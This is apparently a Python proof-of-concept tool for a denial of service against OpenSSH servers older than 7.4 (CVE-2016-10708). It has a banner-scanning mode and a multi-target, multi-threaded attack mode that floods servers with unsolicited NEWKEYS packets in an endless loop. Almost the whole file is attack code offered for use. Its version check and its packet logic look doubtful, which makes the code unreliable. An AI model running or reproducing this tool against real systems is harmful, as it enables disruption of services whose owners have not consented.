#!/usr/bin/env python3 import argparse import logging import os import random import socket import struct import signal import sys import time from typing import List, Optional from concurrent.futures import ThreadPoolExecutor # ---------------------------------------------------------------------- # Constants & Defaults # ---------------------------------------------------------------------- SSH_MSG_NEWKEYS = 21 MAX_BANNER_BYTES = 1024 MAX_SOCKETS_PER_TARGET = 5 MAX_THREADS = 10 DEFAULT_KEX_ALGOS = ["diffie-hellman-group14-sha1"] DEFAULT_HOSTKEY_ALGOS = ["ssh-rsa"] DEFAULT_ENC_ALGOS = ["aes128-ctr"] DEFAULT_MAC_ALGOS = ["hmac-sha1"] DEFAULT_COMP_ALGOS = ["none"] # ---------------------------------------------------------------------- # Logging setup # ---------------------------------------------------------------------- logging.basicConfig( level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s", datefmt="%H:%M:%S", ) log = logging.getLogger() # ---------------------------------------------------------------------- # Normalize version string # ---------------------------------------------------------------------- def _normalize_version(ver: str) -> str: import re m = re.match(r"(OpenSSH_[\d.]+)", ver) return m.group(1) if m else ver # ---------------------------------------------------------------------- # Fetch SSH banner and parse version # ---------------------------------------------------------------------- def get_ssh_version(target: str, port: int = 22, timeout: float = 5.0) -> Optional[str]: try: with socket.create_connection((target, port), timeout=timeout) as sock: sock.settimeout(timeout) data = b"" while b"\n" not in data and len(data) < MAX_BANNER_BYTES: chunk = sock.recv(1024) if not chunk: break data += chunk banner = data.decode(errors="ignore") log.debug(f"Banner from {target}:{port}: {banner.strip()}") except Exception as e: log.error(f"Failed to retrieve banner from {target}:{port} – {e}") return None import re m = re.search(r"OpenSSH_[\d.]+[A-Za-z0-9]*", banner) return _normalize_version(m.group(0)) if m else None # ---------------------------------------------------------------------- # Build NEWKEYS packet # ---------------------------------------------------------------------- def build_newkeys_packet() -> bytes: payload = struct.pack("B", SSH_MSG_NEWKEYS) return _ssh_packet(payload) # ---------------------------------------------------------------------- # Build raw SSH packet with correct padding # ---------------------------------------------------------------------- def _ssh_packet(payload: bytes) -> bytes: base_len = 4 + 1 + len(payload) pad_len = (8 - (base_len % 8)) % 8 if pad_len < 4: pad_len += 8 padding = os.urandom(pad_len) packet_len = len(payload) + pad_len + 1 header = struct.pack(">I", packet_len) + struct.pack("B", pad_len) return header + payload + padding # ---------------------------------------------------------------------- # Exploit logic per thread # ---------------------------------------------------------------------- def exploit_target(target: str, port: int, num_sockets: int): sockets = [] for i in range(num_sockets): try: sock = socket.create_connection((target, port), timeout=5) sock.sendall(b"SSH-2.0-OpenSSH_8.9\r\n") # Realistic banner sockets.append(sock) log.debug(f"[{target}] Socket {i+1} connected") except Exception as e: log.error(f"[{target}] Socket {i+1} failed: {e}") newkeys = build_newkeys_packet() count = 0 log.info(f"[{target}] Starting injection with {num_sockets} sockets") try: while True: for sock in sockets: try: sock.sendall(newkeys) count += 1 log.debug(f"Injected NEWKEYS #{count} ({len(newkeys)} bytes)") except Exception: continue time.sleep(random.uniform(0.0005, 0.002)) # Random micro-delay except KeyboardInterrupt: log.info(f"[{target}] Interrupted") finally: for sock in sockets: sock.close() log.info(f"[{target}] Injection complete — NEWKEYS sent: {count}") # ---------------------------------------------------------------------- # Scan mode # ---------------------------------------------------------------------- def scan(target: str, port: int) -> None: version = get_ssh_version(target, port) if version: log.info(f"{target}:{port} SSH version: {version}") # Extract numeric version for comparison import re m = re.search(r"OpenSSH_(\d+\.\d+)", version) if m: ver_num = float(m.group(1)) if ver_num < 7.4: # All OpenSSH versions before 7.4 are affected by CVE-2016-10708 log.warning( f"{target}:{port} is running vulnerable OpenSSH {version} — CVE-2016-10708 applies" ) else: log.info( f"{target}:{port} appears NOT vulnerable (OpenSSH {version} =≥ 7.4)" ) else: log.debug(f"{target}:{port} version format not recognized for vulnerability check") else: log.warning(f"{target}:{port} – could not determine SSH version") # ---------------------------------------------------------------------- # Graceful shutdown on SIGINT/SIGTERM # ---------------------------------------------------------------------- def _setup_signal_handlers() -> None: for sig in (signal.SIGINT, signal.SIGTERM): signal.signal(sig, lambda *_: sys.exit(1)) # ---------------------------------------------------------------------- # Main # ---------------------------------------------------------------------- def main() -> None: parser = argparse.ArgumentParser(description="Multi-Threaded DoS for SSH < 7.4 - CVE-2016-10708 PoC") parser.add_argument("-t", "--targets", required=True, help="Comma-separated list of target IPs/hostnames") parser.add_argument("-p", "--port", type=int, default=22, help="SSH port (default: 22)") parser.add_argument("-m", "--mode", choices=["scan", "attack"], required=True, help="Mode: scan or attack") parser.add_argument("--sockets", type=int, default=MAX_SOCKETS_PER_TARGET, help="Sockets per target (default: 5)") parser.add_argument("--threads", type=int, default=MAX_THREADS, help="Max concurrent threads (default: 10)") parser.add_argument("-v", "--verbose", action="store_true", help="Enable debug logging") args = parser.parse_args() if args.verbose: log.setLevel(logging.DEBUG) log.debug("Debug logging enabled") _setup_signal_handlers() targets = [t.strip() for t in args.targets.split(",") if t.strip()] if args.mode == "scan": for tgt in targets: scan(tgt, args.port) else: with ThreadPoolExecutor(max_workers=args.threads) as executor: for tgt in targets: executor.submit(exploit_target, tgt, args.port, args.sockets) if __name__ == "__main__": main()